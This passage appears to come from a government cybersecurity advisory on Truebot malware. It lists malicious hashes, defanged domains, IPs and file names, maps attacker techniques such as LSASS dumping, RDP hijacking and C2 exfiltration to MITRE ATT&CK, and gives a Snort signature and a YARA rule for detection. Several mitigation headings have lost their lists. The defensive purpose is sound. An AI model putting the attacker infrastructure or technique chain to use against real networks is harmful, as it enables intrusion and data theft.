092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875
nefosferta[.]com
20643549f19bed9a6853810262622755
c8227dcc1cd6ecc684de8c5ea9b16e3b35f613f1
1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49
nefosferta[.]com
e9299fc9b7daa0742c28bfc4b03b7b25
77360abc473dc65c8bdd73b6459b9ea8fddb6f1d
22e3f4602a258e92a0b8deb5a2bd69c67f4ac3ca67362a745178848a9da7a3cc
nefosferta[.]com
775fb391db27e299af08933917a3acda
eaaa5e68956a3a3f6113e965199f479e10ae9956
2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7
nefosferta[.]com
f4045710c99d347fe6dfa2c0fcadde29
b7bffdbbaf817d149bbd061070a2d171449afbfc
32ae88cddeeeec255d6d9c827f6bffc7a95e9ea7b83a84a79ff793735a4b4ed7
nefosferta[.]com
587acecdb9491e0897d1067eb02e7c8d
a9eb1ac4b85d17da3a2bae5835c7e862d481c189
55d1480cd023b74f10692c689b56e7fd6cc8139fb6322762181daead55a62b9e
nefosferta[.]com
0bae65245e5423147fce079de29b6136
f24232330e6f428bfbb6b9d8154db1c4046c2fc2
6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727
nefosferta[.]com
5022a85b39a75ebe2bc0411d7b058b2e
a9040ac0e9f482454e040e2a7d874ddc50e6f6ce
68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89
nefosferta[.]com
6a2f114a8995dbeb91f766ac2390086e
edac3cf9533b6f7102f6324fadb437a0814cc680
72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d
nefosferta[.]com
e9115cc3280c16f9019e0054e059f4b8
dad01b0c745649c6c8b87dbeb7ab549ed039515d
7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00
nefosferta[.]com
b54cc9a3dd88e478ea601dfd5b36805e
318fdfec4575d1530a41c80274aa8caae7b7f631
7c607eca4005ba6415e09135ef38033bb0b0e0ff3e46d60253fc420af7519347
nefosferta[.]com
f129c12b1bda7426f6b31682b42ee4b0
5bb804153029c97fe23517ae5428a591c3c63f28
7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63
nefosferta[.]com
f68aa4c92dd30bd5418f136aaf6c07d6
aa56f43e39d114235a6b1d5f66b593cc80325fa4
7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca
nefosferta[.]com
acac995cee8a6a75fa79eb41bdffa53f
971a00a392b99f64a3886f40b6ef991e62f0fe2f
97bae3587f1d2fd35f24eb214b9dd6eed95744bed62468d998c7ef55ff8726d4
nefosferta[.]com
36057710279d9f0d023cb5613aa76d5e
e4dd1f8fc4e44c8fd0e25242d994c4b59eed6939
97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0
nefosferta[.]com
37e6904d84153d1435407f4669135134
1dcd85f7364ea06cd595a86e3e9be48995d596e9
bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9
nefosferta[.]com
4f3916e7714f2a32402c9d0b328a2c91
87a692e3592f7b997c7d962919e243b665f2be36
c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887
nefosferta[.]com
d9daaa0df32b0bb01a09e500fc7f5881
f9cb839adba612db5884e1378474996b4436c0cd
c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490
nefosferta[.]com
c87fb9b9f6c343670bed605420583418
f05cf0b026b2716927dac8bcd26a2719ea328964
c6c4f690f0d15b96034b4258bdfaf797432a3ec4f73fbc920384d27903143cb0
nefosferta[.]com
2be64efd0fa7739123b26e4b70e53c5c
318fdfec4575d1530a41c80274aa8caae7b7f631
ed38c454575879c2546e5fccace0b16a701c403dfe3c3833730d23b32e41f2fe
Malicious Domain
IP Addresses
Files
SHA256
Dremmfyttrred[.]com
45.182.189[.]103
94.142.138[.]61
172.64.155[.]188
104.18.32[.]68
Update[.]exe
Document_26_apr_2443807[.]exe
3ujwy2rz7v[.]exe
fe746402c74ac329231ae1b5dffa8229b509f4c15a0f5085617f14f0c1579040
droogggdhfhf[.]com
3LXJyA6Gf[.]exe
7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 6-16 for all referenced cyber threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title
ID
Use
Replication Through Removable Media
T1091
Cyber threat actors use removable media drives to deploy Raspberry Robin malware.
Drive-by Compromise
T1189
Cyber threat actors embed malicious links or attachments within web domains to gain initial access.
Exploit Public-Facing Application
T1190
Cyber threat actors are exploiting Netwrix vulnerability CVE-2022-31199 for initial access with follow-on capabilities of lateral movement through remote code execution.
Phishing
T1566.002
Truebot actors can send spear phishing links to gain initial access.
Technique Title
ID
Use
Command and Scripting Interpreter
T1059
Cyber threat actors have been observed dropping cobalt strike beacons as a reverse shell proxy to create persistence within the compromised network.
Cyber threat actors use FlawedGrace to receive PowerShell commands over a C2 channel to deploy additional tools.
Shared Modules
T1129
Cyber threat actors can deploy malicious payloads through obfuscated share modules.
User Execution: Malicious Link
T1204.001
Cyber threat actors trick users into clicking a link by making them believe they need to perform a Google Chrome software update.
Technique Title
ID
Use
Hijack Execution Flow: DLL Side-Loading
1574.002
Cyber threat actors use Raspberry Robin, among other toolsets to side-load DLLs to maintain persistence.
Technique Title
ID
Use
Boot or Logon Autostart Execution: Print Processors
T1547.012
FlawedGrace malware manipulates print spooler functions to achieve privilege escalation.
Technique Title
ID
Use
Obfuscated Files or Information
T1027
Truebot uses a .JSONIP extension (e.g., IgtyXEQuCEvAM.JSONIP), to create a GUID.
Obfuscated Files or Information: Binary Padding
T1027.001
Cyber threat actors embed around one gigabyte of junk code within the malware string to evade detection protocols.
Masquerading: Masquerade File Type
T1036.008
Cyber threat actors hide Truebot malware as legitimate appearing file formats.
Process Injection
T1055
Truebot malware has the ability to load shell code after establishing a C2 connection.
Indicator Removal: File Deletion
T1070.004
Truebot malware implements self-deletion TTPs throughout its attack cycle to evade detection.
Teleport exfiltration tool deletes itself after it has completed exfiltrating data to the C2 station.
Modify Registry
T1112
FlawedGrace is able to modify registry programs that control the order that documents are loaded to a print que.
Reflective Code Loading
T1620
Truebot malware has the capability to load shell code and deploy various tools to stealthily navigate an infected network.
Technique Title
ID
Use
OS Credential Dumping: LSASS Memory
T1003.001
Cyber threat actors use cobalt strike to gain valid credentials through LSASS memory dumping.
Technique Title
ID
Use
System Network Configuration Discovery
T1016
Truebot malware scans and enumerates the affected system’s domain names.
Process Discovery
T1057
Truebot malware enumerates all running processes on the local host.
System Information Discovery
T1082
Truebot malware scans and enumerates the OS version information, and processor architecture.
Truebot malware enumerates the affected system’s computer names.
System Time Discovery
T1124
Truebot has the ability to discover system time metrics, which aids in enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks.
Software Discovery: Security Software Discovery
T1518.001
Truebot has the ability to discover software security protocols, which aids in defense evasion.
Debugger Evasion
T1622
Truebot malware scans the compromised environment for debugger tools and enumerates them in effort to evade network defenses.
Technique Title
ID
Use
Exploitation of Remote Services
T1210
Cyber threat actors exploit CVE-2022-31199 Netwrix Auditor vulnerability and use its capabilities to move laterally within a compromised network.
Use Alternate Authentication Material: Pass the Hash
T1550.002
Cyber threat actors use cobalt strike to authenticate valid accounts
Remote Service Session Hijacking
T1563.001
Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods.
Remote Service Session Hijacking: RDP Hijacking
T1563.002
Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods.
Lateral Tool Transfer
T1570
Cyber threat actors deploy additional payloads to transfer toolsets and move laterally.
Technique Title
ID
Use
Data from Local System
T1005
Truebot malware checks the current version of the OS and the processor architecture and compiles the information it receives.
Truebot gathers and compiles compromised system’s host and domain names.
Screen Capture
T1113
Truebot malware takes snapshots of local host data, specifically processor architecture data, and sends that to a phase 2 encoded data string.
Technique Title
ID
Use
Application Layer Protocol
T1071
Cyber threat actors use teleport exfiltration tool to blend exfiltrated data with network traffic.
Non-Application Protocol
T1095
Cyber threat actors use Teleport and FlawedGrace to send data over custom communication protocol.
Ingress Transfer Tool
T1105
Cyber threat actors deploy various ingress transfer tool payloads to move laterally and establish C2 connections.
Encrypted Channel: Asymmetric Cryptography
T1573.002
Cyber threat actors use Teleport to create an encrypted channel using AES.
Technique Title
ID
Use
Scheduled Transfer
T1029
Teleport limits the data it collects and syncs with outbound organizational data/network traffic.
Data Transfer Size Limits
T1030
Teleport limits the data it collects and syncs with outbound organizational data/network traffic.
Exfiltration Over C2 Channel
T1048
Cyber threat actors blend exfiltrated data with network traffic to evade detection.
Cyber threat actors use the Teleport tool to exfiltrate data over a C2 protocol.
DETECTION METHODS
CISA and authoring organizations recommend that organizations review and implement the following detection signatures, along with:
Win/malicious_confidence100% (W)
,Trojan:Win32/Tnega!MSR
, andTrojan.Agent.Truebot.Gen
, as well as YARA rules below to help detect Truebot malware.Detection Signatures
alert tcp any any -> any any (msg:”TRUEBOT: Client HTTP Header”; sid:x; rev:1; flow:established,to_server; content:”Mozilla/112.0 (compatible|3b 20 4d 53 49 45 20 31 31 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 30 29|”; http_header; nocase; classtype:http-header; metadata:service http;)
YARA Rules
CISA developed the following YARA to aid in detecting the presence of Truebot Malware.
rule CISA_10445155_01 : TRUEBOT downloader
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10445155"
Date = "2023-05-17"
Last_Modified = "20230523_1500"
Actor = "n/a"
Family = "TRUEBOT"
Capabilities = "n/a"
Malware_Type = "downloader"
Tool_Type = "n/a"
Description = "Detects TRUEBOT downloader samples"
SHA256 = "7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7"
strings:
$s1 = { 64 72 65 6d 6d 66 79 74 74 72 72 65 64 2e 63 6f 6d }
$s2 = { 4e 73 75 32 4f 64 69 77 6f 64 4f 73 32 }
$s3 = { 59 69 50 75 6d 79 62 6f 73 61 57 69 57 65 78 79 }
$s4 = { 72 65 70 6f 74 73 5f 65 72 72 6f 72 2e 74 78 74 }
$s5 = { 4c 6b 6a 64 73 6c 66 6a 33 32 6f 69 6a 72 66 65 77 67 77 2e 6d 70 34 }
$s6 = { 54 00 72 00 69 00 67 00 67 00 65 00 72 00 31 00 32 }
$s7 = { 54 00 55 00 72 00 66 00 57 00 65 00 73 00 54 00 69 00 66 00 73 00 66 }
condition:
5 of them
}
INCIDENT RESPONSE
The following steps are recommended if organizations detect a Truebot malware infection and compromise:
MITIGATIONS
CISA and the authoring organizations recommend organizations implement the below mitigations, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services.
For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and co-sealers recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
Reduce threat of malicious actors using remote access tools by:
See the National Security Agency’s Cybersecurity Information sheet, Enforce Signed Software Execution Policies, and additional guidance below:
In addition, CISA, FBI, MS-ISAC, and CCCS recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
REFERENCES
[1] Bishop Fox: Netwrix Auditor Advisory
[2] Talos Intelligence: Breaking the Silence – Recent Truebot Activity
[3] The DFIR Report: Truebot Deploys Cobalt Strike and FlawedGrace
[4] MAR-10445155-1.v1 .CLEAR Truebot Activity Infects U.S. and Canada Based Networks
[5] Red Canary: Raspberry Robin Delivery Vector
[6] Microsoft: Raspberry Robin Worm Part of a Larger Ecosystem Pre-Ransomware Activity
[7] Telsy: FlawedGrace RAT
[8] VMware Security Blog: Carbon Black’s Truebot Detection
[9] GitHub: DFIR Report – Truebot Malware YARA Rule
Additional Sources
Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors (thehackernews.com)
Truebot Analysis Part 1
Truebot Analysis Part 2
Truebot Analysis Part 3
Truebot Exploits Netwrix Vulnerability
TrueBot malware delivery evolves, now infects businesses in the US and elsewhere
Malpedia-Silence Downloader
Printer spooling: what is it and how to fix it? | PaperCut
ACKNOWLEDGEMENTS
VMware’s Carbon Black contributed to this CSA.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, and co-sealers.
Source de l’article sur us-cert.gov